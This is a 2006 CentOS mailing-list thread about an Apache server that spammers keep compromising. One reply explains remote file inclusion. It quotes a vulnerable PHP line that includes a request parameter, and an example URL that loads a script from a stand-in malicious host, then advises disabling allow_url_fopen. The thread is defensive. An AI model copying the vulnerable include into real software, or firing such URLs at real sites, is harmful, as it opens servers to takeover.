[CentOS] Apache Security
Charles Lacroix
clacroix at cegep-ste-foy.qc.ca
Thu Jun 22 17:30:42 UTC 2006
On Thursday 22 June 2006 13:16, Nicolas Ross wrote:
> > Hello, I have a server running CentOS 4.3 with all the latest updates.
> > The server in question has been hacked by spammers a few times. The
> > details of the hack have been basically the same every time. I find some
> > directory created by the apache user account in /tmp. The new directory
> > contains an html file, and a list of email addresses to spam and a perl
> > script that spams all those email addresses with the html file.
> >
> > My question is why is this happening? Obviously it's some apache
> > exploit. I have removed mod_perl, that didn't help. I have now changed
> > the permissions on the perl executable, that might help we will see, but
> > that doesn't address the core problem. How is it that someone can upload
> > arbitrary files to my server and then execute an arbitrary command via
> > apache.
> >
> > Is this a know problem? Have others seen it? What can I do to help
> > prevent this?
>
> I've also been hacked a couple of times with this sort of exploits. In my
> case, il was an exploit in awstats, a weblog analyser. If you have it, I
> strongly suggest you get up to the latest version...
>
> Also, if you have php scripts installed, they are a frequent source of
> security holes.s
>
> Nicolas
>
> _______________________________________________
> CentOS mailing list
> CentOS at centos.org
> http://lists.centos.org/mailman/listinfo/centos
All the hacks i've seen on my webservers were a combination of bad programming
in php scripts and allow_url_fopen.
i've seen things like
else {
include $_REQUEST["param"];
}
so one could simply modify a url
http://example.com/bad-script.php?param=http://link.to.a.malicious.script/script.php
From there you can put any local exploit code in script.php.
Disabling the allow_url_fopen will help you secure this a bit.
Just check your apache logs you should be able to find interesting information
in there.
I've seen this quite few times.
I hope this can help someone.
More information about the CentOS
mailing list